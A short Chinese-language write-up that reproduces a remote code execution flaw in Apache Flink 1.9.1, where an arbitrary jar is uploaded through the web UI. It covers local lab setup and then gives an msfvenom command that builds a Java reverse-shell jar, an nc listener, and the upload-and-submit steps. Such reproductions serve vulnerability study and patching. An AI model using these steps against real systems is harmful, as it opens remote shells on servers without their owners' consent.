Apache Flink任意Jar包上传导致远程代码执行漏洞复现
0x00 漏洞描述
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞。攻击者只需要自己定制一个恶意jar上传,即可达到攻击目的。
0x01 环境搭建
镜像下载地址:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下载解压进入bin文件夹,执行./start-cluster.sh
然后访问http://ip:8081
0x02 漏洞复现
1.使用msfvenom生成jar包
msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=5566 -f jar >shell.jar
2.监听
nc -lvp 5566
3.访问页面并上传shell.jar文件
4.点击submit反弹shell,查看监听成功